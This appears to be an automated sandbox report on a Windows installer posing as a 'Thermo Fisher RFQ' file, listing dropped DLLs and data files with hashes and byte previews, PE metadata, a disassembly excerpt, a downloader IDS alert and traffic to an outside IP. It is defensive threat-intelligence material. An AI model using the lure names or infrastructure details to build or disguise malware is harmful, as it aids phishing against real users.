SSDEEP:	1536:Jm/FJf9qdyY/zMFRdfxHg2jUsscLrP6d2i2SJ:Itlw7zMFHx/jUqOd2SJ
MD5:	D2D56C0A1BC3F0AE364C30A638393597
SHA1:	B564662188D504D42B22E18A487BF35503B87AF5
SHA-256:	E88BB71C91C537060F76CD2EF8633B767BFD720EFD7AF6F8300BA6883249EACB
SHA-512:	2756334999CFEE833DAC050193745C85D50A3884FCB18220243C1A71086B51E6FF6EB165189BE7748AABB6098F9BD693EB25E539D2ADE56486FA95CB297FD023
Malicious:	false
Preview:	..........................................................=...O}.............C.......................................................................................b..........0.......................................................m...................................................................................................&........-.........D..........................................................%....."......................................................z.......)....................................x............................&..........................................4.....[......V.........................................................=.J..........................................................................................Q.............z........................................................."%F.zt.....................=...............................................A......Y....................f..................................O.......................#.............

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\bucrane.erh

Download File

Process:	C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe
File Type:	data
Category:	dropped
Size (bytes):	186880
Entropy (8bit):	1.2601075629320995
Encrypted:	false
SSDEEP:	768:597pZQKUv2av3tuZ8qbY2vFhkyd8MBkwaKKKbwspvRxtm8dBct2pEW5x1dGkrKLB:Ve2aPPET8MOwaKGeR//1T9dO
MD5:	AA2CD52ABEA96B7E317691ADD713125D
SHA1:	B34046DE9D9A275896762FD53A2DFF2D382EAE56
SHA-256:	C6AD2DCC3B851E06A60FA705CBAA83AADBEC68B10E24CA667088E8153973A7B2
SHA-512:	AD454262C5804887A9596D5CFFCC64D86EB1ED92813A5A37F57D9FCCA21D9C2EF465E51F05879F65BABA7752252B9FEC6352CFB5F678B21D3412B6906EB07C26
Malicious:	false
Preview:	..N......................p..........................................%.............................................................V.............z.N........................i......................................................................................................,(^.............b..n.....&...........................S..................>...................C.................................~...........................K.......................................B.....*..........L.....................j..............!...........O................S................a....C......x...y................................@..............................$...........................................N.........................g.................R...................................@.....................F...........+............................S..........R..............................................g.........................................................................................................

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\theatricism.Ste

Download File

Process:	C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	115746
Entropy (8bit):	2.663564699952671
Encrypted:	false
SSDEEP:	1536:qku528DVwwkDee3DypumYQlBJjspxVhcoG/5V79OeEbuw2W4Oep9Y4H:7M2oT8Gp8GABWWe
MD5:	3A3D3671B7BCCEDA2CE7A8E26AE6E470
SHA1:	9B78F8D751482C6AB6515066A3145433152DC678
SHA-256:	C2377F8B2ED11EEABCC20008F119F12EC7A3D1519BCEEBD5F749133A22704422
SHA-512:	D5BB8C5F439D09DEA4FDCA5FB29EF175C14F60AD4D8489FF3C37763FE2A5A50174253D45F1681C4A150DBA46F0E59768F5346205CAF9717330C1A0369ED0B269
Malicious:	false
Preview:	0000000000007B008700AFAFAFAF0000AE000000FC007B7B0000009C9C00F200FFFF004000505000000000FFFF00BE002A2A000046000000530062004A4A00E00000000000410000C2C20000D9003100A0000000FC000000C200E50095001400008700E400005E0000000000FD00006C6C6C00AA00EF00D8D8D80000A4A40000004A0000006700000002005C000000D8001C004200EEEEEEEEEEEE00A2A2000000000000004D4D0000009090002A2A0000000000C1C1C100D7000047470000000000D8D8D80000C500005F5F0000000000EEEEEEEE00DD00ED000000E0000000F2F200E90000000000DC00460054540000C5C5005959002323000D00001010100000000000000000181800000000C8000000E6003D00002E005A00000074009F9F9F9F9F005200E2E2E20000F3F300000000007400005B5B0000B5B5003100009F9F00007F00E50000530000000000000000181818006A6A000000B5000E0E003E00F4007878000000008A8A8A009F0000A0000000004A4A0000CACA000000C5006D6D007575750000656500000000004B006A6A0000003B00DC0000A9000000000000000000C300A1A1008F8F001F1F1F00000000E0005200006767676767000000CC00CDCD000000003A0000F7F7F7F7F70000000002020000000016000000F5F500000000D3007474006500F8002200000093

C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\LangDLL.dll

Download File

Process:	C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5632
Entropy (8bit):	3.817430038996001
Encrypted:	false
SSDEEP:	48:S46+/sTKYKxbWsptIp5tCZ0iVEAWyMEv9v/ft2O2B8mWofjLl:z+uPbO5tCZBVEAWyMEFv2Cm9L
MD5:	549EE11198143574F4D9953198A09FE8
SHA1:	2E89BA5F30E1C1C4CE517F28EC1505294BB6C4C1
SHA-256:	131AA0DF90C08DCE2EECEE46CCE8759E9AFFF04BF15B7B0002C2A53AE5E92C36
SHA-512:	0FB4CEA4FD320381FE50C52D1C198261F0347D6DCEE857917169FCC3E2083ED4933BEFF708E81D816787195CCA050F3F5F9C5AC9CC7F781831B028EF5714BEC8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: TRIAL_ORDER_CP.exe, Detection: malicious, Browse Filename: TRIAL_ORDER_CP.exe, Detection: malicious, Browse Filename: Thermo Fisher RFQ_TFS-1805.xls, Detection: malicious, Browse Filename: FedEx Shipping Confirmation.exe, Detection: malicious, Browse Filename: IMG_00991ORDER_FILES.exe, Detection: malicious, Browse Filename: FedEx Shipping Confirmation.exe, Detection: malicious, Browse Filename: IMG_00991ORDER_FILES.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsx, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................>..........:..........Rich..........................PE..L....C.f...........!........."......?........ ...............................p............@.........................`"..I...\ ..P....P..`....................`....................................................... ..\............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...`....P......................@..@.reloc..`....`......................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.804946284177748
Encrypted:	false
SSDEEP:	192:ljHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZqE0QPi:R/Qlt7wiij/lMRv/9V4bfr
MD5:	192639861E3DC2DC5C08BB8F8C7260D5
SHA1:	58D30E460609E22FA0098BC27D928B689EF9AF78
SHA-256:	23D618A0293C78CE00F7C6E6DD8B8923621DA7DD1F63A070163EF4C0EC3033D6
SHA-512:	6E573D8B2EF6ED719E271FD0B2FD9CD451F61FC9A9459330108D6D7A65A0F64016303318CAD787AA1D5334BA670D8F1C7C13074E1BE550B4A316963ECC465CDC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: TRIAL_ORDER_CP.exe, Detection: malicious, Browse Filename: TRIAL_ORDER_CP.exe, Detection: malicious, Browse Filename: Thermo Fisher RFQ_TFS-1805.xls, Detection: malicious, Browse Filename: FedEx Shipping Confirmation.exe, Detection: malicious, Browse Filename: IMG_00991ORDER_FILES.exe, Detection: malicious, Browse Filename: FedEx Shipping Confirmation.exe, Detection: malicious, Browse Filename: IMG_00991ORDER_FILES.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsx, Detection: malicious, Browse Filename: AKgHw6grDP.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....C.f...........!....."..................@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\UserInfo.dll

Download File

Process:	C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.3415738744933092
Encrypted:	false
SSDEEP:	48:qK5HC+J4apHT1wH8l9QcXygHg0ZShMmj3jk6TbGr7X:5QiRzuHOXTA0H6jk6nGr7X
MD5:	F8B6DD1F9620BE4EF2AD1E81FB6B79FA
SHA1:	F06C8C8650335BACE41C8DBE73307CBE4E61B3B1
SHA-256:	A921CC9CC4AF332BE96186D60D2539CB413DFA44CFD73E85687F9338505FF85E
SHA-512:	F15811088ECDE4CD0C038DB2C278B7214E41728E382B25C65C2EB491BC0379C075841398E8C99E8CCEBA8BE7E8342BC69D35836EBE9B12EBEBFF48D01D5FA61A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..................[.........Rich..........................PE..L....C.f...........!................~........ ...............................P............@.........................@"......l ..<............................@..p.................................................... ..L............................text............................... ..`.rdata....... ......................@..@.data...h....0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\nsDialogs.dll

Download File

Process:	C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	5.157714967617029
Encrypted:	false
SSDEEP:	96:ooEv02zUu56FcS817eTaXx85qHFcUcxSgB5PKtAtoniJninnt3DVEB3YMNqkzfFc:ooEvCu5e81785qHFcU0PuAw0uyyIFc
MD5:	B7D61F3F56ABF7B7FF0D4E7DA3AD783D
SHA1:	15AB5219C0E77FD9652BC62FF390B8E6846C8E3E
SHA-256:	89A82C4849C21DFE765052681E1FAD02D2D7B13C8B5075880C52423DCA72A912
SHA-512:	6467C0DE680FADB8078BDAA0D560D2B228F5A22D4D8358A1C7D564C6EBCEFACE5D377B870EAF8985FBEE727001DA569867554154D568E3B37F674096BBAFAFB8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\|..c8O`08O`08O`08Oa0.O`0.@=05O`0llP0=O`0.If09O`0.od09O`0Rich8O`0........PE..L....C.f...........!.........0......g........0............................................@..........................6..k....0.......p...............................................................................0...............................text............................... ..`.rdata..{....0......................@..@.data...h!...@......................@....rsrc........p....... ..............@..@.reloc..~............"..............@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\nsExec.dll

Download File

Process:	C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7168
Entropy (8bit):	5.295306975422517
Encrypted:	false
SSDEEP:	96:JgzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuHIDQ:JDQHDb2vSuOc41ZfUNQZGdHA
MD5:	11092C1D3FBB449A60695C44F9F3D183
SHA1:	B89D614755F2E943DF4D510D87A7FC1A3BCF5A33
SHA-256:	2CD3A2D4053954DB1196E2526545C36DFC138C6DE9B81F6264632F3132843C77
SHA-512:	C182E0A1F0044B67B4B9FB66CEF9C4955629F6811D98BBFFA99225B03C43C33B1E85CACABB39F2C45EAD81CD85E98B201D5F9DA4EE0038423B1AD947270C134A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L....C.f...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.94032852740242
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Thermo Fisher RFQ_TFS-1207.com.exe
File size:	605'160 bytes
MD5:	9768c048c979aeeeeb051574d452b626
SHA1:	414d48d77fc71d29e58a92d02fa2d770fb854339
SHA256:	19b8eabc143b4307a4496fec6012965f918e18d0e33a989292568f37a4c5f1ba
SHA512:	9153c973c3ed1f5f1964671e084b1bd764d9850fd87feab3a78acf417178d8f32ee6c16c044020979066bf4b2ad7e2e1e3449a7df3954f78ab9ce9ea649c9bce
SSDEEP:	12288:QG05Z3OJwnoJIn8f/FAOeanklK9N8QGMi7B1mSwIhCjVnj:QGz4om8ftAOLKwuQWB1mSlCjVj
TLSH:	DDD42212D7A0B613D8A2A7356D3D7DE78D3A8C1C5A39D23537113B1A3FB61821D8DE06
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.@.@...@...@../O...@...@..O@../O...@...c...@..+F...@..Rich.@..........................PE..L....C.f.................h....:....

File Icon


Icon Hash:	0f3341494d490706

Static PE Info

General

Entrypoint:	0x40352f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x660843EA [Sat Mar 30 16:55:06 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f4639a0b3116c2cfc71144b88a929cfd

Entrypoint Preview

Instruction
sub esp, 000003F8h
push ebp
push esi
push edi
push 00000020h
pop edi
xor ebp, ebp
push 00008001h
mov dword ptr [esp+20h], ebp
mov dword ptr [esp+18h], 0040A2D8h
mov dword ptr [esp+14h], ebp
call dword ptr [004080A4h]
mov esi, dword ptr [004080A8h]
lea eax, dword ptr [esp+34h]
push eax
mov dword ptr [esp+4Ch], ebp
mov dword ptr [esp+0000014Ch], ebp
mov dword ptr [esp+00000150h], ebp
mov dword ptr [esp+38h], 0000011Ch
call esi
test eax, eax
jne 00007F48B56A99FAh
lea eax, dword ptr [esp+34h]
mov dword ptr [esp+34h], 00000114h
push eax
call esi
mov ax, word ptr [esp+48h]
mov ecx, dword ptr [esp+62h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [esp+0000014Eh], 00000004h
not eax
and eax, ecx
mov word ptr [esp+00000148h], ax
cmp dword ptr [esp+38h], 0Ah
jnc 00007F48B56A99C8h
and word ptr [esp+42h], 0000h
mov eax, dword ptr [esp+40h]
movzx ecx, byte ptr [esp+3Ch]
mov dword ptr [007A8318h], eax
xor eax, eax
mov ah, byte ptr [esp+38h]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [esp+00000148h]
movzx ecx, cx
shl eax, 10h
or eax, ecx
movzx ecx, byte ptr [esp+0000004Eh]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84fc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3d7000	0x5bd8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2a8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x66d1	0x6800	1cb1571d2754df0a2b7df66b1b8d9089	False	0.6727388822115384	data	6.4708065613184305	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1358	0x1400	f0b500ff912dda10f31f36da3efc8a1e	False	0.44296875	data	5.102094016108248	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x39e378	0x600	92e7d2d711bd61815cb4cc2d30d795b1	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x3a9000	0x2e000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3d7000	0x5bd8	0x5c00	404c9a09ca105dd1961875fba238a9ee	False	0.4190726902173913	data	4.970988770122037	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x3d7238	0x5000	Device independent bitmap graphic, 70 x 140 x 32, image size 19600	English	United States	0.413525390625
RT_DIALOG	0x3dc238	0xb8	data	English	United States	0.6467391304347826
RT_DIALOG	0x3dc2f0	0x144	data	English	United States	0.5216049382716049
RT_DIALOG	0x3dc438	0x100	data	English	United States	0.5234375
RT_DIALOG	0x3dc538	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x3dc658	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x3dc6b8	0x14	data	English	United States	1.1
RT_VERSION	0x3dc6d0	0x274	data	English	United States	0.49203821656050956
RT_MANIFEST	0x3dc948	0x290	XML 1.0 document, ASCII text, with very long lines (656), with no line terminators	English	United States	0.5625

Imports

DLL	Import
ADVAPI32.dll	RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
SHELL32.dll	SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
ole32.dll	CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll	MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
GDI32.dll	GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
KERNEL32.dll	lstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-29T21:56:43.611985+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49838	443	192.168.11.20	199.217.106.226

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 29, 2024 21:56:43.124260902 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.124365091 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.124538898 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.149547100 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.149614096 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.393348932 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.394016027 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.448733091 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.448813915 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.449960947 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.450093985 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.452749968 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.496220112 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.612030983 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.612169981 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.612266064 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.612332106 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.612361908 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.612361908 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.612361908 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.612452030 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.612581015 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.724863052 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.725076914 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.725223064 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.725275040 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.725306034 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.725377083 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.725544930 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.725799084 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.725964069 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.725964069 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.726016045 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.765754938 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.766408920 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.766410112 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.839121103 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.839406967 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.840006113 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.840269089 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.840562105 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.840733051 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.840930939 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.841402054 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.841589928 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.841720104 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.841944933 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.842109919 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.842184067 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.878062010 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.878221035 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.878386974 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.878453016 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.878614902 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.878720999 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.955332041 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.955493927 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.955594063 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.955622911 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.955652952 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.955728054 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.955728054 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.955775023 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.955862999 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.955872059 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.955900908 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.955997944 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.955997944 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.956046104 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.956125975 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.956144094 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.956166983 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.956271887 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.956334114 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.956437111 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.956583977 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.956712961 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.956727028 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.956754923 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.956933975 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.957006931 CEST	443	49838	199.217.106.226	192.168.11.20
Aug 29, 2024 21:56:43.957247972 CEST	49838	443	192.168.11.20	199.217.106.226
Aug 29, 2024 21:56:43.957278013 CEST	443	49838	199.217.106.226	192.168.11.20
